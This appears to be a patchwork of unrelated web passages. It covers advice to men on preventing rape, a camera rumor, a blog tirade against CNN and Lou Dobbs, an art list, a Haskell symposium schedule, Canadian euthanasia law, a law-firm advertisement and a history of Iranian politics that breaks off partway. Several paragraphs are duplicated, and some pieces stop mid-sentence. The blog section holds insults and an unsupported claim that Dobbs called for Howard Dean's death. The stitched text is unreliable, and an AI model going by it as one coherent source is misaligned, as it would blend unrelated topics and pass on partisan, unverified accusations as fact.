Talk with women ... about how the risk of being raped affects their daily lives ; about how they want to be supported if it has happened to them ; about what they think men can do to prevent sexual violence .
If you 're willing to listen , you can learn a lot from women about the impact of rape and how to stop it .
about how the risk of being raped affects their daily lives ; about how they want to be supported if it has happened to them ; about what they think men can do to prevent sexual violence .
If you 're willing to listen , you can learn a lot from women about the impact of rape and how to stop it .
Talk with men ... about how it feels to be seen as a potential rapist ; about the fact that 10 - 20 % of all males will be sexually abused in their lifetimes ; about whether they know someone who 's been raped .
Learn about how sexual violence touches the lives of men and what we can do to stop it .
about how it feels to be seen as a potential rapist ; about the fact that 10 - 20 % of all males will be sexually abused in their lifetimes ; about whether they know someone who 's been raped .
Learn about how sexual violence touches the lives of men and what we can do to stop it .
Organize .
Form your own organization of men focused on stopping sexual violence .
Men 's anti-rape groups are becoming more and more common around the country , especially on college campuses .
If you have the time and the drive , it is a wonderful way to make a difference in your community .
Form your own organization of men focused on stopping sexual violence .
Men 's anti-rape groups are becoming more and more common around the country , especially on college campuses .
If you have the time and the drive , it is a wonderful way to make a difference in your community .
Work against other oppressions .
Rape feeds off many other forms of prejudice -- including racism , homophobia , and religious discrimination .
By speaking out against any beliefs and behaviors , including rape , that promote one group of people as superior to another and deny other groups their full humanity , you support everyone 's equality .
Rape feeds off many other forms of prejudice -- including racism , homophobia , and religious discrimination .
By speaking out against any beliefs and behaviors , including rape , that promote one group of people as superior to another and deny other groups their full humanity , you support everyone 's equality .
Do n't ever have sex with anyone against their will !
No matter what .
Although statistics show most men never rape , the overwhelming majority of rapists are male .
Make a promise to yourself to be a different kind of man -- one who values equality and whose strength is not used for hurting .
I know this is a lengthy piece ( even though I ’ve only scratched the surface ) , and for those of you who have read to this point , thank you .
Again , no one deserves a medal for caring about harm to others or for caring about rape , but many people do not even invest the amount of time you ’ve invested in reading this , so you ’ve already stepped it up today more than most .
Caring to inform yourself about a topic so difficult is no small deal , and it makes a big difference when it comes to rape prevention .
I want to leave you with what I think is a powerful and meaningful challenge for yourself , one I very deeply am sure you 're all up to .
Like many women , I have faith in men , and truly feel that men right now are capable of making changes for themselves and others which many have n’t been strong enough to make before .
We ’ve talked here about the idea of a “ false ” strength and a “ false ” masculinity , or machismo , that are about or incorporate things like domination , abuses of power , obedience to other men , violence or hate .
With feminist movements , women realized that the feminine , ideas about and roles for women , needed a profound makeover and takeover , and tirelessly dedicated themselves to doing so which brought about massive positive changes in many women ’s ( as well as men ’s ) lives over a relatively short period of time .
Those changes also allowed more women to design their own femininity , rather than having someone else assign it to them .
Given , women did n’t come up with most of those ideas and constructs about us , men did , but all of you did n’t come up with the ideas and constructs many men have about masculinity , women and male sexuality , either .
It was men before you who defined roles and ideas about your gender , too , just like they did with ours .
our message boards .
I 've covered a lot of ground here , but there still is a lot more to talk about , Too , this might be the first time some of this has been addressed this way to you , and you may want to sort out your feelings about it .
If you want to talk about this piece or issues raised in it , feel free to hop over to
I dare you to be the compassionate , courageous author of your own masculinity , and a better one than whatever you ’ve been shown or told was ideal ; a better one than is so often celebrated in most of our cultures while it ’s doing men and women alike harm .
In that self - design , identify strength and masculinity not as what you or another man does that shows male power over someone else , but as what you do to truly empower yourself and others : identify those qualities with the very best parts of yourself .
Meet , face and come through challenges to your male identity by standing up for what you know is right and refusing to participate , in any way , in what you know is not , even if doing so means you are less easily accepted by other men around you or results in you having to change habits or ways of thinking which are n’t easy to change or supported as well as they should be .
One of the strongest men in history , Martin Luther King , Jr. , said that “ Nonviolence is a powerful and just weapon which cuts without wounding and ennobles the man who wields it .
It is a sword that heals . ”
Real strength -- something we all are capable of having , and not something someone else can give us -- is n’t about force ; it ’s about resiliency , dignity , humanity and character , and about the power not to fall in line or to dominate , but to resist anything that causes you to be less than who you really are , or takes that personhood away from someone else .
Real strength is never violent , and protects others , rather than doing harm .
It is not a strong person who rapes or supports any part of rape : it is a weak one .
You can be – and maybe you already are – that strong , and so can other men .
If and when you all are , everything we know about rape points to the strong possibility that you guys – that ’s right , you guys – can make a huge change for yourselves , others and the world at large that could stop rape for good .
This rumor is brought to you by Xitek , a Chinese photography forum .
It shows a Pen - style interchangeable lens camera from Panasonic , apparently called the GF - 1 .
The pictures come from a PDF detailing the camera , and are either a rather good fake or the real deal .
There ’s nothing odd in the specs , for example , and the camera follows Panasonic ’s Lumix design style perfectly .
Standout differences between this and Olympus micro four thirds camera are a lack of in - body stabilization and the addition of a pop-up flash ( it slides out whole from the type , just like the LX - 3 ) .
Those lenses are from Leica , by the way , which gets us very hot and bothered — the will fit on the Pen ( EP - 1 ) too , remember .
In fact , we have a feeling that unless Leica can knock one out of the park with the M9 body , it should do a semi-Sega and give up on cameras , concentrating on kick - ass lenses for MFT .
After all , the Pen is essentially to today ’s DSLR what the original Leica was to the unwieldy Speed Graphics of its time .
All links to the original forum page now go nowhere , but the discussion lives in the DP Review forums and some details are preserved by Photo Rumors .
It will have a 12.1 effective megapixels sensor , a three - inch , 460,000 dot screen , 720 p video mode and dust removal .
Size is 119 mm x 71 mm x 36.3 mm , almost exactly the same as the Pen ( 120.6 mm x 69.9 mm x 36.4 mm ) .
One odd thing to note is that little mini-USB shaped hole on the back , below the hotshoe ?
Is it for an optical add - on viewfinder ?
I sure hope not .
Panasonic GF1 ( Micro Four Thirds ) [ Photo Rumors ]
Panasonic new M4/3 GF1 [ DP Review ]
It is this broader context that makes CNN 's decision to lend its good name to the birther conspiracy so egregious and so dangerous .
With the blessing of the network , Lou Dobbs has given the smear an unparalleled level of credibility by reporting it as an ongoing and unresolved story .
His coverage is part of a career spent advancing prejudicial , anti-immigrant , and conspiratorial right - wing canards .
He has also portrayed Obama as a " socialist " and compared him to fascist dictators .
Again , this from a " journalist " with a prime time show on CNN , the self - described " most trusted name in news , " a network that has publicly advocated its political neutrality and commitment to serious , fact - based reporting .
There is n't a single progressive issue that is n't in danger of being overwhelmed by this right - wing campaign and its central narrative .
Health care reform is a socialist takeover .
Restructuring bankrupt companies is a ruse designed to give the government direct control over the economy .
Obama 's speech in Cairo was part of a " Muslim apology tour " that shows how eager he is to blame America first and how unwilling he is to defend it ( he is , after all , a false Christian , important to those who irrationally fear Islam ) .
In the absence of any new legislation involving gun ownership , Democrats are still supposedly committed to overturning the Second Amendment which will further support tyranny .
New environmental regulations and green energy promotion represent an encroachment upon personal liberty , an excuse for more federal power and higher federal taxes , all based on the myth of global warming .
No matter what progressive issue you pick , conservatives are working to turn it into nothing less than sedition , carried out by an illegal president who is actually a traitor .
The conservative media is their megaphone , with the mainstream media all - too often following suit .
The future success of every progressive initiative will be impacted by what information the American people receive .
We must respond forcefully , swiftly , and collectively to counteract the distorting and dangerous impact of the right - wing noise machine whenever and wherever it appears .
And we must demand integrity from mainstream news organizations .
If there is any doubt about what progressives are up against , consider the fact that last week , Dobbs officially abandoned his self - appointed " Mr. Independent " label .
" What do you think you 're doing Barack Obama ? " he said on his radio show , accusing the president of promoting " mindless , churlish , un- American nonsense . "
He continued : " I 'm moving from being an independent , sir , to being absolutely opposed to any policy you could conceive of . "
Yet just days earlier , he had told Don Imus that CNN president Jon Klein and " all of the folks at CNN are just terrifically supportive . "
If we can't even prevent CNN from functioning as a right - wing propaganda organ , then we have no hope of ever getting a fair hearing on any issue .
Conservative goals and tactics will not change on their own .
The Right will keep doing what works .
Whenever the increasingly prevalent right - wing cry of " I want my country back ! " is heard , progressives must understand what is behind the words , and realize that unless they act , we will lose the greatest opportunity in a generation to redefine the American political landscape .
This long , slow march from the debacle of the Goldwater campaign of 1964 through the triumph of Ronald Reagan and , ultimately , the consolidation of power under George W. Bush from 2000 to 2008 depended in everything on how tightly the movement fasted itself to popular irrationality from economics to fringe religion .
The movement swallowed whole the quack doctrine of supply - side economics , adopting it with almost comically ferocious zeal ...
[ And i ] n June 2007 , a Gallup poll found that 68 percent of the Republicans surveyed said that they did not believe in evolution at all .
And this was the ascendant political power at the time .
Movement conservatism was so successful that it drove its own media , particularly talk radio , and conservative media fed back the enthusiasm into the movement , energizing it further .
The movement 's gift for confrontation was ideally suited to media in which controversy drove ratings , which then drove the controversy , and so forth .
The more traditional media joined in , attracted , as they always are , by power and success .
The more the movement succeeded politically , the tighter it was bound to the extremes that helped power it .
CNN anchor Lou Dobbs has apparently gone insane .
Or was he drunk yesterday when he called for the death of Howard Dean ( below ) or when he distorted what Nancy Pelosi and Steny Hoyer said about disruptive teabaggers keeping citizens from having discussions with their elected representatives ?
Dobbs is a divisive ratings whore , willing to lie and slander anyone with his self righteous Know Nothing rants to drive his sinking ratings up .
CNN should be ashamed .
They should also lose their broadcast license for inciting violence , assassination and murder .
This morning I watched the Senate 's resident dingbat , Missouri Democrat ( ugghhh ) Claire McCaskill at a town hall meeting demonizing something she apparently does n't understand , single payer health insurance , after some Dobbs or Limbaugh or Beck - fueled constituent got up and started raving about the slippery slope to socialism .
Imagine if Missouri had a senator who could explain what the health insurance racket is and how single payer health care reform could benefit them and their families instead of using Insurance Industry talking points straight from the GOP playbook .
But then , of course , Ms , McCaskill -- only in office for a couple years -- has already scooped up $ 352,900 from the Medical - Industrial Complex and another $ 71,339 from Big Insurance ... plenty of reasons to not try too hard to understand what single payer actually is .
She sounds a lot like a Republican , even like an imbecile like Peter King ( R - NY ) who calls reform " radical " and validates Insurance Industry anti-health care memes .
King assures his listeners he wants " some " reform while the Insurance CEOs and their lobbyists and astro -turf outfits are acknowledging that their goal is " no reform at all .
" It 's funny that the corporate media -- more , except in Fox 's case , for ratings than for an ideological agenda -- is propping up the Republican jihad against health care reform , spreading partisan fear and smear and inciting people to violence .
So while Eric Cantor 's and Mitt Romney 's Republican Party rebranding effort of a few months ago has flamed out entirely , the Republicans have learned they do n't actually have to do anything remotely proactive -- just throw bricks at whatever the president wants to accomplish and count on the deranged penny - media nuts to blow it up into national outrage .
Every single CNN employee should feel ashamed of what their company is doing to America .
And , as Paul Krugman noted Sunday , explaining that the GOP does n't have toanything but obstruct and demonize : " We do know , however , what Republicans in opposition have been saying -- and it boils down to demanding that the government stop standing in the way of a possible depression .
" Charles Pierce put it all into perspective in his brilliant book , Idiot America Here 's Obama in New Hampshire today .
CNN and MSNBC carried it live .
Fox , never wanting facts to get in the way of their reporting , did n't .
I especially liked this line in the beginning : " I do n't think government bureaucrats should be meddling [ with your health care decisions ] but I also do n't think insurance company bureaucrats should be meddling . "
The audience seemed to appreciate that too .
Labels : CNN , incitement to murder , Lou Dobbs
President of WebFX .
Bill has over 25 years of experience in the Internet marketing industry specializing in SEO , UX , information architecture , marketing automation and more .
William 's background in scientific computing and education from Shippensburg and MIT provided the foundation for MarketingCloudFX and other key research and development projects at WebFX .
Character illustrations and digital paintings can inspire you greatly in your own works .
Working with digital art means that you have a greater creative license to great stunning pieces of artwork .
In this collection , you will see some fantastic illustrations of dudes .
If you like this collection , you may also wish to see a previous collection that features surreal illustrations of female characters .
1. Gangsta game character by Bernardo Barbi
2. Sergej the false clown by Michael Kutsche
3. Obama by Vincent Hie
4. Last Elf by Piotr Fox Wysocki
5. Sgt ROCK v1 by Vadim Makarenko
6. Kicking Hell ’s Ash no 2 by Vincent Hie
7. Spiderman 3 by Jeremy Roberts
8. Bishop by Michal Kwolek
9. Islander by Gina Pitkanen
10 . Tom Cruise by Dave Gaskin
11 . October by Del Melchionda
12 . Carlzon portrait by Dave Gaskin
13 . Tom Baker by Lee Davies
14 . Minh by Elizabeth Le
15 . Gerard Butler Digital Painting by Sarah Rose Oliver
16 . Leonardo detail by Mahir Ates
17 . Angry Mage v2 by Raffaele Picca
18 . Home and the Fairies by Michael Zancan
19 .
After the rain by Diane Ozdamar
20 . Captain Jack Sparrow by Jeremy Roberts
Related Content
Keeping an eye on the increasing amount of space debris is no easy task ( Image : European Space Agency / Rex Features )
A WORLDWIDE network of radar stations could tackle the ever - growing problem of space debris – the remains of old rockets and satellites that pose an increasing threat to spacecraft .
The US government is launching a competition , which will run until the end of 2010 , to find the best way of tracking pieces of junk down to the size of a pool ball .
Three aerospace companies – Northrop Grumman , Lockheed - Martin and Raytheon – have each been awarded $ 30 million by US …
Desperate times call for desperate measures .
Such is the case with the state of Arizona as politicians try to solve a huge budget deficit .
Members of the Arizona legislature are considering selling the house of representatives and senate buildings in Phoenix and then leasing them back .
Eventually the state would buy the buildings back .
Other buildings owned by Arizona , such as a hospital and state fairgrounds , may also be sold and leased in an effort to fix a $ 3.4bn ( £ 2 bn ) shortfall .
Under the arrangement , government services would continue as the state picks up $ 735 m in cash .
For investors , the deal means long - term lease payments from a stable source .
So is n't this a mess ?
The results of the local and Euro elections wo n't be through in their entirety until Sunday , but we can say with some certainty that hundreds if not thousands of people who in all other respects one might consider decent have exercised their democratic vote to the benefit of a man apparently not averse to hobnobbing with the former Grand Wizard of the Ku Klux Klan .
Communities in the north and a smattering in the south find themselves willing to make common cause with representatives of the BNP , a party that despises minorities and gay people and sees mixed - race children as a sickening affront to racial purity .
The results we see so far do n't meet the party 's much trumpeted expectations , but it has claimed county council seats in Lancashire and Leicestershire – its first – and it polled strongly in another of its target counties , Essex .
Nick Griffin hopes to be an MEP by Monday .
Strange times .
Worrying times .
How did it come to this ?
Is it that the Tories are to blame for encouraging xenophobia over Europe , as senior Labour backbencher Denis MacShane claimed on Comment is free last month ?
Certainly the Tory line on Europe and immigration more generally will not have helped .
Is it Labour 's fault , as Tory chairman Eric Pickles said earlier this week , getting his excuses in early ?
Well , certainly the bulk of the BNP 's support occurs in areas that were once Labour strongholds .
Labour ministers , watching traditional supporters drift away , have , at times , sought to entice it back with illiberal phraseology .
Desperate measures , and not just desperate , but also futile .
And yet , in truth , what we are hearing from both sides is yah - boo stuff .
It 's irritating because they must know the problems involve both of them .
This situation has n't appeared from nowhere .
It is the result of negligence .
The architects of New Labour did not see the need to involve ordinary working people .
They focused their attention on the limited numbers of seats and on the limited demographic they identified as necessary to get the party elected : Daily Mail readers and voters in the marginals .
They cut the cord with the unions and the activist left , both of which were seen as a drag on their ambitions .
But both provided grassroots links , connections with communities and foot soldiers .
There was nothing to take up the slack .
They demoralised local government in the drive towards centralism , so too many good people opted out .
Too many of those who replaced them enjoyed the status of office and the machinations of life in the town halls , but lost sight of the core requirement that they forge links with their constituents .
Voters on estates I visited in Barking complained that they had not seen a councillor in 10 years .
Into this vacuum came the BNP , telling lies as it suited them , exploiting fears about immigration , whipping up prejudices about crime and surfing a wave of Islamophobia .
But why was there a vacuum ?
Because Labour failed and , largely speaking , the Tories were no better .
They too were chasing the middle class vote and the marginals and they were not about to worry themselves about areas they regarded as Labour fiefdoms , even those that had become failed states .
They concentrated on the winnable seats .
There is a logic to it .
But the result of the decision by both parties to practise politics as the route to election victory rather as a tool for representing the broadest possible spread of communities left the door wide open for Griffin and his snake - oil salesmen .
Does this mean the BNPs supporters are all racist ?
Certainly the party at its core is racist .
But for every ideologue follower there are others who have no wish to hobnob with types from the Ku Klux Klan .
They just feel neglected and marginalised .
The evidence so far is that where there is the option of a protest vote for a party other than the BNP , people are taking it .
Some of their grievances are reasonable , some irrational , some based on falsehoods peddled deliberately , but in any event , before these can be addressed , the main parties are going to have to reconnect with those they have left behind .
Not just by desperately spouting drivel such as " British jobs for British workers " , but also by working much harder at local level .
Mainstream politicians are going to have to win back their trust .
The BNP is a shambles with ludicrous policies and poisonous intent , but it thrives where its malignancy has been allowed to grow .
It has not succeeded ; rather the mainstream parties have failed .
Session 1
Session chair : Janis Voigtlaender
9:00
Welcome
9:10
Types Are Calling Conventions
Max Bolingbroke and Simon Peyton Jones
9:35
Losing Functions Without Gaining Data - Another Look at Defunctionalisation
Neil Mitchell and Colin Runciman
10:00
Coffee Break
Session 2
Session Chair : Jeremy Gibbons
10:30
Push - pull Functional Reactive Programming
Conal Elliott
10:55
Unembedding Domain - specific Languages
Robert Atkey , Sam Lindley and Jeremy Yallop
11:20
A Compositional Theory for STM Haskell
Johannes Borgstrom , Karthikeyan Bhargavan and Andrew D Gordon
11:45
Roll Your Own Test Bed for Embedded Real - Time Protocols : A Haskell Experience
Lee Pike , Geoffrey Brown and Alwyn Goodloe
12:00
Lunch
Session 3
Session Chair : Simon Marlow
13:30
Lazy Functional Incremental Parsing
Jean - Philippe Bernardy
13:55
Alloy : Fast Generic Transformations for Haskell
Neil Brown and Adam Sampson
14:20
The Architectures of The Utrecht Haskell Compiler
Atze Dijkstra , Jeroen Fokker and Doaitse Swierstra
14:45
Tool Demonstration : CLasH : From Haskell to Hardware
Christiaan Baaij , Matthijs Kooijman , Jan Kuper , Marco Gerards and Bert Molenkamp
15:00
Coffee Break
Session 4
Session Chair : Mark P. Jones
15:30
Parallel Performance Tuning for Haskell
Don Jones Jr , Simon Marlow and Satnam Singh
15:55
Type -Safe Observable Sharing in Haskell
Andy Gill
16:20
Finding the needle : Stack Traces for GHC
Tristan Allwood , Simon Peyton - Jones and Susan Eisenbach
16:45
Short Break
Session 5
17:00
Discussion on The Future of Haskell
He praised Pakistan ’s co-operation with the international police community and added : " Unless terrorist - related information is registered on Interpol ’s global databases and shared among its global network , no international terrorist investigation can ever be considered complete and all countries which do not have this vital information are at risk .
It ’s a lot of work managing the Haskell packages for Arch Linux .
We use the principle of automating all parts of the packaging process , and rely on cabal to give us good metadata about our packages .
However , over time we end up with packages generated for Arch using old versions of tools , or gaps in coverage .
In order to ensure consistent , high quality packages , we ’ve been building a programmatic interface to AUR and Hackage , to automate checking of package sanity .
You can find :
Latest status for all Arch Haskell packages
The new archlinux library , for programmatic query and search on AUR , Hackage and Cabal .
And updates to cabal2arch to support canonical package names , haddock documentation generation by default , and work around bugs in yaourt ’s dependency management .
With the new AUR package linter tool it should be easier to ensure all those Haskell packages are building and working as desired .
Wildlife Conservation Society
Dot Earth likes a good animal photo as much as the next blog , particularly when the animal is beautiful and endangered .
So we ’re pleased to present a photograph of a snow leopard , taken by a camera trap in the Wakhan Corridor in northeastern Afghanistan .
( Here ’s more on camera traps and Afghanistan ’s elusive wildlife . )
Camera traps are used by conservationists to document the presence of animals that because of their rarity , behavior or other factors would otherwise be seldom seen .
The basic trap consists of a camera and a means of triggering it — often an infrared device or some other motion sensor .
Workers try to set the traps in areas the target animal is likely to pass through — en route to a water or food source , for example .
And the sensor is calibrated so that smaller animals or swaying tree limbs should n’t trigger it .
Despite all this , camera traps do n’t always capture their quarry .
And even when they do , the subject is sometimes out of focus , or half out of the frame or plagued by red eye .
And sometimes you get a fabulous shot of the animal ’s derriere .
This photograph , though , is spectacular ( if a trifle cockeyed ) .
The trap was set up by workers with the Wildlife Conservation Society , the people who run the Bronx Zoo and undertake conservation projects around the world .
In the Wakhan Corridor they are conducting wildlife surveys with the eventual goal of establishing a protected area .
" I will neither give a deadly drug to anybody if asked for it , nor will I make a suggestion to this effect . "
So goes the medical profession 's Hippocratic Oath .
And yet , it does seem " hypocritical " to compare that oath with the stark reality of medical practice in geriatric , cancer , AIDS or incurable disease wards of modern hospitals .
One American doctor made a name for himself ( and got a 10 - year prison sentence ) by having designed a death machine whereby the patient is administered a lethal dose of drugs , drop - by - drop , to induce a slow but peaceful death .
Dr. Kevorkian was released from jail on June 1 , 2007 after serving 8 years of his sentence .
Dr. Jack Kevorkian actions , and the prevalence of the fatal HIV virus , have brought the euthanasia debate to the forefront .
Euthanasia is the putting to death , by painless method , of a terminally - ill or severely debilitated person through the omission ( intentionally withholding a life - saving medical procedure , also known as passive euthanasia ) or the commission of an act ( active euthanasia ) .
Two sections of Canada 's Criminal Code are relevant :
" 14 .
No person is entitled to consent to have death inflicted on him , and such consent does not affect the criminal responsibility of any person by whom death may be inflicted on the person by whom consent is given .
" 241 .
Everyone who counsels a person to commit suicide or aids or abets a person to commit suicide , whether suicide ensues or not , is guilty of an indictable offence and liable to imprisonment for a term not exceeding fourteen years . "
The reality of modern medicine is that doctors do practice passive euthanasia ; not all of them , but rare is the doctor that has not , at the request of the patient , the patient 's family , or on his or her own accord , decided to discontinue life - support .
Consider § 58 of Quebec 's Code of Ethics for Physicians ( 2011 ) for doctors :
" A physician must , when the death of a patient appears to him to be inevitable , act so that the death occurs with dignity .
He must also ensure that the patient obtains the appropriate support and relief . "
1
Studies also show that many doctors have acquiesced to life - ending drug doses in cases of advanced terminal conditions - assisted suicide ; aka active euthanasia .
But try finding one to admit it .
Assisting suicide or intentional killing , even to reduce suffering , is criminal conduct .
More interesting is the situation where a doctor decides to withhold or withdraw medical care for euthanasia reasons .
Section 215 of the Criminal Code says that :
" ... every one is under a legal duty to provide necessaries of life to a person under his charge if that person is unable , by reason of ( ... ) illness , mental disorder or other cause , to withdraw himself from that charge and is unable to provide himself with the necessaries of life . "
The Courts have captured medical treatment under this section , essentially preventing doctors from withholding or withdrawing life - sustaining procedures .
Doctors are also under legal obligation to ensure that patients , for whom a risk of suicide exists , are prevented from harming themselves .
On the other side of the coin , Canadian citizens have a basic right to refuse medical care and treatment and they have a right to decide what medical treatment they accept or reject , even if the rejection of a life - saving procedures leads to their death .
This is part of the Canadian Charter of Rights and Freedoms : " every one has the right to ( ... ) security of the person and the right not to be deprived thereof . "
Quebec 's Civil Code reiterates this principle .
This would include , for example , Jehovah Witnesses refusing blood transfusions .
Living wills present another legal dilemma .
They are documents which set out guidelines for dealing with life - sustaining medical procedures in the eventuality of the signatory 's sudden debilitation .
Living wills would , for example , inform medical staff not to provide extraordinary life - preserving procedures on their bodies if they are incapable of expressing themselves and suffering from an incurable and terminal condition .
The value of a living will is debatable .
One of the most serious problems is the common occurrence that nobody on the medical staff is made aware of the living will .
Medical staff must also consider other factors :
Has the " will " ever been revoked ?
Are there competing living wills ?
Were there capacity issues with the person at the time she or he signed the living will ?
What if a surviving relative wants the hospital to overlook the living will ?
How far will the living will go in preventing the doctor from subsequent criminal charges under 215 of the Criminal Code ?
What if the living will is on audio - tape ?
Some provinces have been toying with legislation to allow living wills under certain circumstances .
In British Columbia , representation agreements can be drafted which allow a person to pre-determine what happens if they are ever in need of life - sustaining medical treatments .
REFERENCES :
The moment you are arrested , the rest of your life hangs in the balance .
It may seem impossible to believe , but the actions of a single day can have wide and varied consequences .
You could lose your driver ’s license , be placed on the sex offender registry , face assault charges , or be forced to serve time — and even if you suffer a minor penalty , you could still carry a criminal record that robs you of future opportunities .
The Police Are Hoping You Do n’t Know Your Rights
No matter what charges you are facing , you are at a significant disadvantage if you do n’t know your rights .
From the police who arrested you to the prosecution team that is working hard to get a conviction , everyone on the opposing side has done this before .
You may even be frightened enough to agree to the charges , hoping for leniency or a reduced sentence .
DO NOT do this — and definitely , DO NOT attempt to go through this alone !
You need an advocate — someone who will listen , ensure your rights are protected at all points of the criminal process , and create a customized defense strategy that will lead to an acquittal .
You need someone who will give you an honest appraisal of your options , work toward your goals with determination , and ensure that your privacy is protected throughout the course of your case .
You need an experienced DUI Lawyer or Criminal Defense Attorney .
At The Law Offices of Steven R. Adams , we assist clients who have been accused of a crime throughout various areas of Southern Ohio and Northern Kentucky .
If you need someone who will fight for your rights after a traffic violation , DUI , violent crime , drug offense , or other criminal activity , we stand ready to help .
Call us today at ( 513 ) 929-9333 or fill out the contact form on this page to speak with a criminal defense attorney .
July 1 , 2009
WITH REPRESSION silencing most street protests for the moment as hardliners tighten their grip , is a democratic transformation -- or revolutionary change - - possible in Iran ?
Answering that question requires looking at Iranian history , politics and society beyond the disputed June 12 election , in which the government made the outrageous claim that incumbent President Mahmoud Ahmadinejad received more than 62 percent of the vote -- 24.5 million , compared to 11 million votes for his leading opponent , Mir Hussein Mousavi , who was gaining growing support in the weeks before the vote .
In the aftermath of the election , what began as a factional dispute between two wings of the Iranian ruling class sparked mass demonstrations in the capital city of Tehran that , according to the city 's mayor , involved some 3 million people .
While the protests have receded in the face of vicious attacks by security forces -- which killed at least 17 and arrested hundreds -- Iranian politics will never be the same .
The country 's rulers and institutions are discredited , and the pro-democracy movement , previously led by students and intellectuals , has greatly expanded its social depth .
Protesters in Tehran rally against the dubiouse election results and mourn the deaths of other protesters ( Ehsan Maleki | Sipa )
Rather than end that movement , the government 's crackdown marks the beginning of the movement 's transformation into a more powerful social force in the months and years ahead .
But before looking at the roots of that movement and the prospects for its development , it 's necessary -- strangely enough -- to take up the question of whether the Iranian popular struggle is a legitimate one .
Both neoconservatives on the right and some prominent figures on the left have argued -- echoing Ahmadinejad -- that the protests are just the noisy complaints of disgruntled middle - class minority that 's sore over an election loss .
Some on the left further suggest that U.S. covert operations must be behind the protests -- given Washington 's funding and support for the color - coded " revolutions " that toppled leaders in Serbia , Ukraine and other countries .
Certainly the U.S. is intervening in Iran by imposing economic sanctions over that country 's nuclear energy program .
It is also aiding armed rebellions by national minorities , such as the Kurds and Balochis , and allowing an Iranian Sunni Muslim extremist group , Jundallah , to conduct terror campaigns in Iran from across the border in Pakistan .
Featured at Socialism Hear Lee Sustar at Socialism 2009 in Chicago and San Francisco , speaking on " The Economic Crisis and the New Imperialism " and " Iran : From the 1979 Revolution to Rebellion in the Streets Today . "
Check out the Socialism 2009
Web site for more details .
See you at Socialism !
But the idea that Iran 's mass democracy movement is a creation of Washington is simply ludicrous .
This argument was systematically debunked by Reese Erlich , the veteran independent journalist and author of a recent book on Iran , who was in Tehran during the elections .
In an article titled , " Iran and Leftist Confusion , " he wrote :
[ T ]he multi-class character of the most recent demonstrations , which arose quickly and spontaneously , were beyond the control of the reformist leaders in Iran , let alone the CIA ...
Frankly , based on my observations , no one was leading the demonstrations .
During the course of the week after the elections , the mass movement evolved from one protesting vote fraud into one calling for much broader freedoms .
You could see it in the changing composition of the marches .
There were not only upper - middle - class kids in tight jeans and designer sunglasses .
There were growing numbers of workers and women in very conservative chadors .
Erlich 's observations are correct .
The social composition of the movement has changed rapidly -- and its further development will require sinking more roots into the working class .
To better understand how the movement took shape , and its future prospects , it 's helpful to look briefly at the history of Iranian politics in the 30 years since the 1979 revolution .
Revolution and counterrevolution
IF THE hardliners around Ahmadinejad and Supreme Leader Ayatollah Ali Khamanei are seeking to crush the revolt in Iran today , it 's because they well remember the revolutionary potential of the Iranian working class .
Its mass strikes compelled the U.S. - backed dictator , the Shah of Iran , to flee the country .
" Indeed , the entry [ into activism ] of the working class made possible the eventual triumph of the Islamic Revolution , " wrote Ervand Abrahamian , a leading historian of Iran .
Abrahamian continued :
By the third week of October [ 1978 ] , a rapid succession of strikes crippled almost all the bazaars , universities , high schools , oil installations , banks , government ministries , post offices , railways , newspapers , customs and port facilities , internal air flights , radio and television stations , state - run hospitals , paper and tobacco plants , textile mills and other large factories .
In effect , the working class had joined the middle classes to bring about a massive and unprecedented general strike ... The Shah faced not just a general strike but a political general strike ... [ B ]y December 25 , a series of general strikes had again brought the whole economy to a grinding halt , and grassroots strike committees had occupied many large factories , government ministries and communications centers .
These factory councils , or shoras in the Farsi language , were classic examples of workers ' power seen in previous revolutions , as in the Russian soviets in 1905 and 1917 , Barcelona in 1936 and Hungary in 1956 .
But the central leader of the revolution was n't the left , but the clergy and middle - class elements who looked to Ayatollah Ruhollah Khomeini .
Khomeini appropriated the language and demands of the left to call for an Islamic society .
After Khomeini's return to Iran from exile in February 1979 , revolutionary committees loyal to him set up an Islamist parallel to a provisional revolutionary government .
These forces dismantled working - class organization and divided the left -- and later , violently smashed it .
Iraq 's 1980 invasion of Iran , launched with the approval of the U.S. , created a siege atmosphere that helped Khomeini and the clerics consolidate their power .
As historian Nikki Keddie explained in her history of modern Iran :
Increasingly in the post - revolution period , political power was concentrated in the hands of the Khomeneist clergy and the bazaar bourgeoisie .
Soon after the revolution , there were land seizures by peasants in some regions , and factory strikes and workers ' committees set up in urban areas , but the authorities , whether by compromise , persuasion or force , gradually brought such movements under control .
Post - revolution faction fights
After imprisoning , executing or forcing into exile its opponents on the right and left , the new ruling class soon divided into rival political groupings .
Central to the debate was how to manage the economy .
Large sections of industry came under control of the state or religious foundations controlled by Shia clergymen who were closely tied to the state .
The divisions broke out roughly into three camps : an Islamist left , which maintained some of the social rhetoric of the revolution ; an Islamist right , based around the most conservative clergy ; and a pragmatic right dominated by clerics who were close to , or had become part of , big business interests .
Over the next two decades , these factions would clash over how Iran should engage with the world , economically , politically and culturally .
During the Iran - Iraq War of 1980 - 88 , the Islamist left was ascendant .
Mir Hussein Mousavi , then prime minister , oversaw extensive state control of Iran 's economy .
Government rationing was used to feed workers and the poor during periods of runaway inflation of food prices .
Mousavi justified his policies on religious grounds .
" The way of Islam is to attend to social justice , " he said , adding elsewhere , " the security of the revolution lies in the eradication of poverty and serving the destitute ... Capital must not rule and the priority of the regime should be the poor and not the well - off . "
Mousavi 's economic policies emulated earlier attempts at using state capitalist methods of national development , as pursued by Egypt under the Nasser governments of the 1950s and 1960s .
The end of the war , and Khomeini 's death a year later , brought the factional struggles into the open .
The cleric Ali Akbar Hashemi Rafsanjani , a wealthy businessman and leader of the pragmatic right , forced a constitutional change that eliminated the post of prime minister , and soon was elected president himself .
He succeeded Ali Khamanei , who went on to replace Khomeini as supreme leader , despite a lack of religious qualifications for the post .
Rafsanjani , a staunch defender of private property , favored more engagement with the West .
( Rafsanjani had been a key player in the Iran - Contra scandal , in which Iran bought U.S. - made weapons in exchange for helping to get Western hostages released in Lebanon .
The money Iran spent on weapons went to fund Nicaragua 's right - wing counterrevolutionary uprising , in violation of U.S. law . )
In his two terms as president , Rafsanjani failed to find a way out of Iran 's international isolation .
The economy recovered partially from the devastation of the war years , as Rafsanjani used the state to rationalize industries with the aim of development , following the example of the East Asian " tiger " economies .
But Iran 's economy was still weak , vulnerable to slumps in oil prices and beset by chronic inflation .
Workers ' living standards declined , leading to riots in 1992 and , despite savage repression , again in 1994 - 95 .
With Rafsanjani barred by Iran 's constitution from seeking a third term in the 1997 presidential elections , the pragmatic conservatives aligned themselves with elements of the Islamist left .
